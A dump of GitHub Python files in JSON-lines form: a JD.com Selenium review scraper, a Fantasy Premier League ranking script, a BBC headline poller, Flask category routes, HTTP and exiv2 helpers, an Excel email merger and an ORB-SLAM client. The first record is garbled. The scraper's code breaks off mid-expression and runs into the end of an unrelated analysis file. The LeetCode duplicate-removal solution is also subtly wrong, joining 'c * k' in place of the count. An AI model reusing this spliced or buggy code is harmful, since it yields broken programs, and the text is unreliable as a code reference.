+{"seq_id":"21312596308","text":"from bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver \r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.phantomjs.webdriver import WebDriver\r\nimport json\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver import ActionChains\r\nfrom random import randint\r\nfrom multiprocessing import Semaphore,Process\r\nimport re\r\nimport os\r\n\r\ndef get_cookie():\r\n\toptions=webdriver.ChromeOptions()\r\n\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\toptions.add_experimental_option(\"prefs\", prefs)\r\n\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\toptions.add_argument('--disable-infobars')\r\n\toptions.add_argument('--disable-gpu') \r\n\toptions.add_argument('--incognito')\r\n\t#options.add_argument('--headless')\r\n\tdriver = webdriver.Chrome(chrome_options=options)\r\n\tdriver.get('https://passport.jd.com/new/login.aspx?ReturnUrl=https%3A%2F%2Fwww.jd.com%2F')\r\n\ttry:\r\n\t\tresult=WebDriverWait(driver,100).until(EC.title_is('京东(JD.COM)-正品低价、品质保障、配送及时、轻松购物!'))\r\n\texcept:\r\n\t\tprint(\"no!!\")\r\n\r\n\tcookies=driver.get_cookies()\r\n\tcookies=json.dumps(cookies)\r\n\twith open(\"cookies.json\",\"w\") as fbb:\r\n\t\t\tjson.dump(cookies,fbb)\r\n\r\nsem_all_html=Semaphore(1)\r\nsem_end=Semaphore(0)\r\nsem_url=Semaphore(0)\r\nsem_cook=Semaphore(1)\r\nclass acq_url(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_html,self).__init__()\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tpage_num=10\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tsleep(0.5)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"key\"]').send_keys('蓝牙键盘')\r\n\t\tsleep(2)\r\n\t\tdriver.find_element_by_xpath('//*[@id=\"search\"]/div/div[2]/button').click()\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i1 in range(page_num):\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\tprint(i)\r\n\t\r\n\t\t\tsleep(randint(3,5))\r\n\r\n\t\t\twith open(\"page_\"+str(i1)+'.html','wb') as f:\r\n\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\tsem_url.release()\r\n\t\t\tprint(\"写入成功\",i1)\r\n\t\t\tsleep(randint(5,8))\r\n\t\t\tac.send_keys(Keys.RIGHT).perform()\r\n\r\nclass 
acq_html(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\toptions=webdriver.ChromeOptions()\r\n\t\tprefs = {\"profile.managed_default_content_settings.images\": 2,'profile.default_content_setting_values' : { 'notifications' : 2 }}\r\n\t\toptions.add_experimental_option(\"prefs\", prefs)\r\n\t\tuser_ag='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'\r\n\t\toptions.add_argument('--user-agent=%s'%user_ag)\r\n\t\toptions.add_argument('--disable-infobars')\r\n\t\toptions.add_argument('--disable-gpu') \r\n\t\toptions.add_argument('--incognito')\r\n\t\t#options.add_argument('--headless')\r\n\t\tdriver = webdriver.Chrome(chrome_options=options)\r\n\t\tsem_cook.acquire()\r\n\t\twith open(\"cookies.json\",\"r\") as f:\r\n\t\t\tcookies=json.loads(json.load(f))\r\n\t\tsem_cook.release()\r\n\t\tdriver.get(\"https://www.jd.com\")\r\n\t\tdriver.delete_all_cookies()\r\n\t\tfor cookie in cookies:\r\n\t\t\tdriver.add_cookie(cookie)\r\n\t\tac=ActionChains(driver)\r\n\t\tfor i in range(10):\r\n\t\t\tsem_url.acquire()\r\n\t\t\twith open(\"page_\"+str(i)+\".html\",'rb') as f:\r\n\t\t\t\ttext=bs(f.read(),'html.parser')\r\n\t\t\tlianjie=[]\r\n\t\t\tfor link in text.find_all('strong'):\r\n\t\t\t\tfor lin in link.find_all('a'):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tlianjie.append(\"https:\"+lin.get(\"href\"))\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(\"null\")\r\n\t\t\tfor ind,t in enumerate(lianjie):\r\n\t\t\t\tprint(t)\r\n\t\t\t\tdriver.get(t)\r\n\t\t\t\tpage_all=-1\r\n\t\t\t\tfor index in range(2,7):\r\n\t\t\t\t\tsleep(randint(0,2))\r\n\t\t\t\t\tfor n in range (randint(2,4)):\r\n\t\t\t\t\t\tac.send_keys(Keys.PAGE_DOWN).perform()\r\n\t\t\t\t\t\tsleep(randint(0,3))\r\n\t\t\t\t\t#if page_all==-1:\r\n\t\t\t\t\t\t#cc=driver.find_element_by_xpath('/html/body/div[10]/div[2]/div[3]/div[2]/div[2]/div[1]/ul/li[1]/a/em').text\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_css_selector(\"[data-anchor='#comment']\")\r\n\t\t\t\t\t\t#cc=driver.find_elements_by_link_text('商品评价')\r\n\t\t\t\t\t\t#all_num=cc.text\r\n\t\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\t\twith open(\"all.html\",'ab') as f:\r\n\t\t\t\t\t\tf.write(driver.page_source.encode(\"utf-8\",\"ignore\"))\r\n\t\t\t\t\tsem_all_html.release()\r\n\t\t\t\t\tif sem_end.get_value()<0:\r\n\t\t\t\t\t\tsem_end.release()\r\n\t\t\t\t\tprint(\"save!!\")\r\n\t\t\t\t\tsleep(randint(5,8))\r\n\t\t\t\t\tflag=-1\r\n\t\t\t\t\tfor indx,ele in enumerate(driver.find_elements_by_link_text(str(index))):\r\n\t\t\t\t\r\n\t\t\t\t\t\ttx = ele.get_attribute(\"rel\")\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tif tx==str(index):\r\n\t\t\t\t\t\t\t\tprint(\"ins\")\r\n\t\t\t\t\t\t\t\tflag=1\r\n\t\t\t\t\t\t\t\tele.click()\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tprint(\"ee\",indx)\r\n\t\t\t\t\r\n\t\t\t\t\tif flag==-1:\r\n\t\t\t\t\t\tbreak\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\n\t\tsem_end.release()\r\nclass acq_data(Process):\r\n\tdef __init__(self):\r\n\t\tsuper(acq_data,self).__init__()\r\n\t\r\n\tdef run(self):\r\n\t\tcommit=[]\r\n\t\twhile sem_end.get_value()==0:\r\n\t\t\tif os.path.exists(\"all.html\"):\r\n\t\t\t\tprint(\"存在\")\r\n\t\t\t\tsem_all_html.acquire()\r\n\t\t\t\twith open(\"all.html\",'rb') as f:\r\n\t\t\t\t\tgg=f.read().split(b' 90)\n ]\n .copy()\n .sort_values([\"gkCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n 
\"influence\",\n \"creativity\",\n \"threat\",\n \"gkCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_def = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"DEF\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"defCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"defCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_mid = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"MID\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"midCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"midCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n top_fwd = (\n player_core.loc[\n (player_core[\"singular_name_short\"] == \"FWD\")\n & (player_core[\"minutes\"] > 90)\n ]\n .copy()\n .sort_values([\"fwdCombinedIndex\"], ascending=False)[\n [\n \"first_name\",\n \"second_name\",\n \"name\",\n \"form\",\n \"selected_by_percent\",\n \"total_points\",\n \"minutes\",\n \"influence\",\n \"creativity\",\n \"threat\",\n \"fwdCombinedIndex\",\n ]\n ]\n .copy()\n )\n\n pass\n\n\nif __name__ == \"__main__\":\n imported_data = importData()\n out = preProc(imported_data)\n","repo_name":"desiretheory/fpl","sub_path":"fpl/fpl/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":9455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29589209738","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport time\r\nfrom datetime import datetime\r\n\r\n#set default variable\r\ncurrent_top1 = \"Blank\"\r\ni = 0\r\n\r\n# create infinite loop to keep program running\r\nwhile True:\r\n # use BeautifulSoup to get BBC web page and access top story #1 headline\r\n page = requests.get(\"https://www.bbc.co.uk/news\")\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n top1_div = soup.find(\"div\", attrs={\"data-entityid\": \"container-top-stories#1\"})\r\n top1_head = top1_div.h3.string\r\n\r\n # used to add timestamp to any change to top story\r\n now = datetime.now()\r\n current_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\r\n\r\n # check if top story headline has changed and print relevant result\r\n if(top1_head != current_top1):\r\n print(\"New Top Story!!! (\", current_time, \")\")\r\n print(top1_head)\r\n current_top1 = top1_head\r\n i=0\r\n else:\r\n if(i % 10 == 0):\r\n print(\"No change to top story, current top story is:\")\r\n print(top1_head)\r\n else:\r\n print(\"...\")\r\n i+=1\r\n # to add delay to loop re-running\r\n time.sleep(10.0)\r\n","repo_name":"EuanDodds/Portfolio-Projects","sub_path":"bbc_top_story.py","file_name":"bbc_top_story.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74895826010","text":"class Solution:\n def removeDuplicates(self, s: str, k: int) -> str:\n stack = [] # [{\"a\":3} , {\"b\":5} , ...]\n for i, ch in enumerate(s):\n if stack and stack[-1][0] == ch:\n stack[-1][1] += 1\n if stack[-1][1] == k:\n stack.pop()\n else:\n stack.append([ch, 1])\n\n return ''.join(c * k for c, cnt in stack)\n","repo_name":"debbs061/algorithm","sub_path":"src/1209-remove-all-adjacent-duplicates-in-string-2.py","file_name":"1209-remove-all-adjacent-duplicates-in-string-2.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12601230276","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models.category import db, Category\nfrom ..forms.category_form import CategoryForm\nfrom .auth_routes import validation_errors_to_error_messages\n\ncategory_routes = Blueprint('categories', __name__)\n\n\n# CREATE A NEW CATEGORY\n@category_routes.route('/new', methods=['POST'])\n@login_required\ndef create_category():\n form = CategoryForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n if form.validate_on_submit():\n category = Category(\n name=form.data['name'],\n user_id=current_user.id\n )\n db.session.add(category)\n db.session.commit()\n\n return category.to_dict(), 200\n else:\n return {'errors': validation_errors_to_error_messages(form.errors)}, 401\n\n\n# READ ALL CATEGORIES\n@category_routes.route('/')\n@login_required\ndef user_categories():\n user_categories = Category.query.filter_by(user_id=current_user.id).all()\n return {'categories': [category.to_dict() for category in user_categories]}, 200\n\n\n# GET CATEGORY INFO BASED ON CATEGORY ID (GRABS ALL ITEMS IN CATEGORY)\n@category_routes.route('/')\n@login_required\ndef one_category(category_id):\n user_category = Category.query.get(category_id)\n if user_category:\n if user_category.user_id == current_user.id:\n return {'category': user_category.to_dict()}, 200\n else:\n return {'errors': 'Unauthorized to get this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n\n\n# UPDAE A CATEGORY NAME BASED ON CATEGORY ID\n@category_routes.route('/', methods=[\"PUT\", \"PATCH\"])\n@login_required\ndef update_category(category_id):\n form = CategoryForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n if form.validate_on_submit():\n category = Category.query.get(category_id)\n\n if category:\n if category.user_id == current_user.id:\n category.name = form.data['name']\n db.session.commit()\n return category.to_dict(), 200\n else:\n return {'errors': 'Unauthorized to update this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n else:\n return {'errors': validation_errors_to_error_messages(form.errors)}, 400\n\n\n# DELETE A CATEGORY FROM CATEGORY ID\n@category_routes.route('/', methods=[\"DELETE\"])\n@login_required\ndef delete_category(category_id):\n category = Category.query.get(category_id)\n if category:\n if category.user_id == current_user.id:\n db.session.delete(category)\n db.session.commit()\n return {'message': 'Category deleted successfully'}, 200\n else:\n return {'errors': 'Unauthorized to delete this category'}, 401\n else:\n return {'errors': 'Category not found'}, 404\n","repo_name":"yassin30000/inventory_now","sub_path":"app/api/category_routes.py","file_name":"category_routes.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20286369385","text":"\"\"\"\n联网相关\n\"\"\"\n\nimport os\n\nimport requests\n\n\ndef get(url, params=None, headers=None, cookies=None, encoding='utf-8', result_type='text', need_print=True):\n \"\"\"\n 获取数据\n :param url: 地址\n :param params: 参数\n :param headers: 头\n :param cookies: cookies\n :param encoding: 编码\n :param result_type: 结果类型\n :param need_print: 是否需要打印\n :return:\n \"\"\"\n # 伪装头\n # Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\n ua = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'\n if headers is None or not isinstance(headers, dict):\n headers = {\n 'User-Agent': ua\n }\n else:\n if not 'User-Agent' in headers.keys():\n headers['User-Agent'] = ua\n # 打开请求\n if need_print:\n print(\"open \" + url)\n if params is not None:\n print('params', params)\n result = requests.get(url, params=params, headers=headers, cookies=cookies)\n result.encoding = encoding\n if result_type == 'text':\n result = result.text\n elif result_type == 'json':\n result = result.json()\n if need_print:\n print(f'result is {result_type}\\n{result}')\n return result\n\n\ndef get_file(url, file_path, need_print=True, **kwargs):\n \"\"\"下载文件\"\"\"\n if need_print:\n print('下载文件 %s ,从 %s' % (file_path, url))\n dir_name = os.path.dirname(file_path)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n if need_print:\n print('创建目录 %s' % dir_name)\n r = requests.get(url, None, **kwargs)\n with open(file_path, 'wb') as f:\n f.write(r.content)\n if need_print:\n print('下载完成')\n\n\ndef parse_cookies_from_file(file_path, exit_if_not_exists=True):\n \"\"\"\n 从文件中解析 cookies\n :param file_path: 文件路径\n :param exit_if_not_exists:文件不存在时,是否退出\n :return:\n \"\"\"\n if not os.path.exists(file_path):\n print('cookies file not exists:', file_path)\n if exit_if_not_exists:\n exit()\n else:\n return\n with open(file_path, encoding='utf-8') as f:\n return parse_cookies(f.read())\n\n\ndef parse_cookies(cookies=''):\n \"\"\"从字符串中解析出 cookies\"\"\"\n result = dict()\n if not cookies:\n return result\n\n key_value_list = cookies.split(';')\n for key_value in key_value_list:\n key_value_pair = key_value.split('=', maxsplit=1)\n if len(key_value_pair) == 2:\n key, value = key_value_pair\n result[key.strip()] = value.strip()\n return result\n\n\ndef parse_params_from_file(file_path):\n with open(file_path, encoding='utf-8') as f:\n return parse_params(f.read())\n\n\ndef cookies_to_str(cookies):\n \"\"\"转 cookies 为字符串\"\"\"\n return ';'.join([k + '=' + v for k, v in cookies.items()])\n\n\ndef parse_params(params):\n \"\"\"\n 解析参数,从 fiddler 中抓取后直接复制\n 以 # 开头或者空行将被忽略\n \"\"\"\n data = {}\n for line in params.split('\\n'):\n if line.startswith('#'):\n continue\n if '\\t' not in line:\n continue\n key, value = line.split('\\t')\n data[key] = value\n return data\n\n\ndef handle_result(request, success_callback=None, fail_callback=None, print_result=True):\n \"\"\"处理结果\"\"\"\n result = request.json()\n if print_result:\n print(result)\n if result:\n code = result['code']\n if code == 200:\n # 成功\n data = result['data']\n if success_callback:\n success_callback(data)\n return data\n else:\n # 失败\n msg = result['msg']\n print(msg)\n if fail_callback:\n fail_callback(code, msg)\n else:\n # 结果为空\n if fail_callback:\n fail_callback(0, None)\n return 
None\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/xx/netx.py","file_name":"netx.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"}
+{"seq_id":"1510032279","text":"# -*- coding: utf-8 -*-\nfrom subprocess import CalledProcessError\nfrom typing import List\n\nfrom lib import cli\nimport lib.meta_data as md\nfrom lib.config import Configuration\nfrom tests.defines import EXIV2_WARN_ERROR_CODE\n\n\nclass ExifEditor:\n\n def __init__(self, config: Configuration):\n self._config = config\n\n def get_meta_data_safe(self, path: str) -> md.MetaData:\n \"\"\"\n :raises InvalidMetaDataError if the exiv data of the file could not be parsed\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n return self.get_meta_data(path)\n except CalledProcessError:\n return md.empty()\n\n def get_meta_data(self, path: str) -> md.MetaData:\n \"\"\"\n :raises CalledProcessError if the exiv2 command terminated abnormally\n InvalidMetaDataError if the exiv data of the file could not be parsed\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n serialized = self._read_exif_field(self._config.exif_field_name, path)\n except CalledProcessError as e:\n if _is_file_not_found(e):\n raise FileNotFoundError(e)\n else:\n raise e\n return md.deserialize(serialized)\n\n def set_meta_data(self, path: str, data: md.MetaData):\n \"\"\"\n :raises CalledProcessError if the exiv2 command terminated abnormally\n FileNotFoundError if the file could not be found\n \"\"\"\n try:\n self._write_exif_field(self._config.exif_field_name, data.serialize(), path)\n except CalledProcessError as e:\n if _is_file_not_found(e):\n raise FileNotFoundError(e)\n else:\n raise e\n\n def _read_exif_field(self, field_name: str, path: str) -> str:\n base = self._build_exiv_base_command()\n command = self._build_exiv_read_command(base, field_name, path)\n std_out_lines = cli.run_cmd(command, EXIV2_WARN_ERROR_CODE)\n return \" \".join(std_out_lines[0].split()[3:])\n\n def _write_exif_field(self, field_name: str, value: str, path: str):\n base = self._build_exiv_base_command()\n command = self._build_exiv_write_command(base, field_name, value, path)\n cli.run_cmd(command)\n\n def _build_exiv_base_command(self) -> List[str]:\n cmd = ['exiv2', '-n', self._config.exiv2_charset]\n if self._config.exiv2_quiet:\n cmd.append('-q')\n return cmd\n\n def _build_exiv_read_command(self, base_command: List[str], field_name: str, path: str):\n base_command.append('-b')\n base_command.append('-K')\n base_command.append(field_name)\n base_command.append(path)\n return base_command\n\n def _build_exiv_write_command(self, base_command: List[str], field_name: str, value: str, path: str):\n if self._config.exiv2_keep_time_stamps:\n base_command.append('-k')\n base_command.append('-M')\n base_command.append('set ' + field_name + ' ' + value)\n base_command.append(path)\n return base_command\n\n\ndef _is_file_not_found(error: CalledProcessError):\n return error.returncode == 255\n","repo_name":"enguerrand/tie","sub_path":"lib/exif_editor.py","file_name":"exif_editor.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33978138416","text":"import logging, glob, re, click\nfrom sqlalchemy import create_engine, Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import distinct\nfrom openpyxl import load_workbook\nfrom xlrd import *\n\n\n# configure sqlalchemy\nColumn = Column\nInteger = Integer\nString = String\nBase = declarative_base()\ncreate_engine = create_engine\nengine = create_engine('sqlite:///:memory:', echo=True)\nSession = sessionmaker(bind=engine)\n\n\nclass UserEmail(Base):\n __tablename__ = 'emails'\n\n id = Column(Integer, primary_key=True)\n user_id = Column(String(128))\n email = Column(String(320))\n\n\nBase.metadata.create_all(engine)\n\n\n# configure logging\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef find_all_reports(dir):\n # 'AllReviewsReport', 'AllReviewsbyContributorReport'\n return glob.glob('{0}/*{1}*.xls'.format(dir, 'AllReviewsReport'))\n\n\ndef get_emails(reports):\n \"\"\"Get all reports, collect all 'User ID' and 'User Email Address'\n values\"\"\"\n logging.debug(reports)\n for r in reports:\n wb = open_workbook(r)\n if 'All Reviews Report' in wb.sheet_names():\n ws = wb.sheet_by_name('All Reviews Report')\n logging.debug('cols: {0}, rows: {1}'.format(ws.ncols, ws.nrows))\n logging.debug(ws.name)\n logging.debug(ws.row(3))\n logging.debug(ws.row(3)[0].value)\n\n email_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User Email Address']\n\n if len(email_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User Email Address'))\n\n userid_loc = [{'row': row, 'col': col}\n for col in range(ws.ncols)\n for row in range(ws.nrows)\n if ws.cell_value(row, col) == 'User ID']\n\n if len(userid_loc) > 1:\n raise ValueError('More than one column in the All Reviews\\\n Report \"{0}\" was named \"{1}\"'.format(\n r,\n 'User ID'))\n\n emails = [UserEmail(\n user_id=ws.cell_value(row, userid_loc[0]['col']),\n email=ws.cell_value(row, email_loc[0]['col']))\n for row in range(email_loc[0]['row'] + 1, ws.nrows)]\n\n logging.debug(emails)\n logging.debug(dir(emails[0]))\n\n session = Session()\n\n session.add_all(emails)\n session.commit()\n\n logging.debug(session.query(UserEmail).distinct(UserEmail.email).group_by(UserEmail.email).count())\n\n\n\ndef dedupe_emails():\n pass\n\n\ndef merge_emails():\n pass\n\n\n@click.command()\n@click.argument('dir', type=click.Path(exists=True,\n writable=True))\ndef cli(dir=\".\"):\n \"\"\"\"Simple progam that takes Bazaarvoice All Reviews Report, pulls in all\n 'User ID' and 'User Email Address' data, de-dupes it and merges it into\n the All Reviews by Contributor report, merging on\n 'User ID' and 'Reviewr ID'.\"\"\"\n logging.debug(dir)\n reports = find_all_reports(dir)\n get_emails(reports)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"arteedecco/all-reviews-reports-merge","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36949143983","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime, date, timedelta\nfrom utils import log_msg\nfrom bwdb import DB\nimport argparse\nimport os\nimport sys\n\n\ndef init_globals(args):\n global app_root, db\n app_path = os.path.dirname(os.path.realpath(__file__))\n app_root = os.path.realpath(os.path.join(app_path, '..'))\n\n db = DB(db=args.database)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Sniff interface to record metrics of IP packets.')\n\n #parser.add_argument('-c', '--config', type=str,\n # default='bwm.cfg',\n # help='configuration file')\n parser.add_argument('-d', '--database', type=str,\n default='net_mon.db',\n help='database')\n parser.add_argument('-M', '--minute_table', type=int,\n default=8,\n help='weeks to keep minute table')\n parser.add_argument('-H', '--hour_table', type=int,\n default=26,\n help='weeks to keep hour table')\n parser.add_argument('-D', '--day_table', type=int,\n default=520,\n help='weeks to keep day table')\n\n return parser.parse_args()\n\n\ndef create_tables():\n global db\n log_msg('creating tables')\n db.create_tables()\n\n\ndef rebuild_table(name=''):\n global db\n log_msg('rebuilding table: name='+str(name))\n day = db.get_min_full_day()\n db.summarize_data(name, day, compare='>=')\n log_msg('rebuilding done')\n\n\ndef archive_table(name='', weeks=''):\n global db\n day = (date.today() - timedelta(weeks=weeks)).strftime('%Y-%m-%d')\n log_msg('archiving table: name='+str(name)+', weeks='+str(weeks)+', day='+str(day))\n log_msg('archiving done')\n\n\nif __name__ == \"__main__\":\n global db\n\n log_msg('Initializing '+__file__+'...')\n\n args = parse_args()\n\n init_globals(args)\n\n rebuild_table('hour')\n rebuild_table('day')\n #archive_table('minute', args.minute_table)\n #archive_table('hour', args.hour_table)\n #archive_table('day', args.day_table)\n\n log_msg('Done.')\n\n","repo_name":"streckc/bwm","sub_path":"bin/db_maint.py","file_name":"db_maint.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"32141788491","text":"import utility\nimport resolution_equation as resolve\nimport variable_equation as veq\ndef base_function():\n user_input = utility.get_equation()\n user_input = user_input.replace(\" \", \"\")\n mode = utility.chose_mode(user_input)\n if not mode:\n result = resolve.create_result(user_input)\n else:\n result = veq.resolve_variable_equation(user_input)\n\n if result == 'Errore':\n print('Errore')\n base_function()\n else:\n print(result)\n response = input(\"Do you want to continue? Y/N \")\n control = utility.control_response(response)\n if control:\n base_function()\n else:\n print('GoodBye')","repo_name":"GvMazzon25/FirstPythonProject","sub_path":"sub_main.py","file_name":"sub_main.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7483085639","text":"import zmq\nimport cv2\nimport numpy as np\nimport time\nimport imageio\n\n\nclass OrbSlam2Connector:\n # slam server 地址\n slam_server_address = '127.0.0.1:35696'\n # 掉线标记\n offline = True\n # 连接时最大尝试次数\n max_try_count = 10\n\n\n _SLAM_SYSTEM_NOT_READY = -1,\n _SLAM_NO_IMAGES_YET = 0,\n _SLAM_NOT_INITIALIZED = 1,\n _SLAM_OK = 2,\n _SLAM_LOST = 3\n\n def __init__(self):\n self.start_time = time.time()\n print('orbslam2_connector: init slam connect')\n self.ctx = zmq.Context()\n self.socket = self.ctx.socket(zmq.REQ)\n self.socket.setsockopt(zmq.LINGER, 0)\n self.socket.setsockopt(zmq.RCVTIMEO, 1000)\n self.socket.setsockopt(zmq.SNDTIMEO, 1000)\n # 要求如果没有建立链接,立刻返回\n self.socket.setsockopt(zmq.IMMEDIATE, True)\n # 要求应答序号要一一对应\n self.socket.setsockopt(zmq.REQ_CORRELATE, True)\n # 要求不严格轮换\n self.socket.setsockopt(zmq.REQ_RELAXED, True)\n\n self.socket.connect('tcp://%s' % self.slam_server_address)\n while self.offline:\n try:\n print('orbslam2_connector: try say hello to slam server')\n self.socket.send(bytes(np.array([-1], np.int32)))\n data = self.socket.recv()\n if len(data) == 4:\n data = int(np.frombuffer(data, np.int))\n if data == -1:\n print('orbslam2_connector: connect success')\n self.offline = False\n continue\n print('wrong data')\n except zmq.error.Again:\n print('orbslam2_connector: connect out of time, will try again')\n\n\n def get_pos(self, imgLR):\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n assert imgLR.shape == (360, 1280, 3)\n\n ts = time.time() - self.start_time\n ts = int(ts*1000)\n mtype = bytes(np.array([1], np.int32))\n timestamp = bytes(np.array([ts], np.int32))\n imcode = bytes(cv2.imencode('.jpg', imgLR)[1])\n imcode_len = bytes(np.array([len(imcode)], np.uint32))\n msg = mtype + timestamp + imcode_len + imcode\n\n try:\n self.socket.send(msg, copy=False)\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功发送\n if self.offline:\n print('orbslam2_connector: found offline when send data')\n return False, None\n\n try:\n data = self.socket.recv()\n self.offline = False\n except zmq.error.Again:\n self.offline = True\n\n # 如果没有成功接收\n if self.offline:\n print('orbslam2_connector: found offline when recv data')\n return False, None\n\n if len(data) != 76:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n mtype = np.frombuffer(data[0:4], np.int32)[0]\n slam_status = np.frombuffer(data[4:8], np.int32)[0]\n rel_mat = np.frombuffer(data[8:72], np.float32).reshape([4, 4])\n restart_count = np.frombuffer(data[72:76], np.int32)[0]\n\n if mtype != 1:\n print('orbslam2_connector: recv data wrong')\n return False, None\n\n if slam_status != self._SLAM_OK:\n print('SLAM is not OK')\n return False, None\n\n return restart_count, rel_mat\n\n def get_restart_count(self):\n pass\n\n def get_status(self):\n 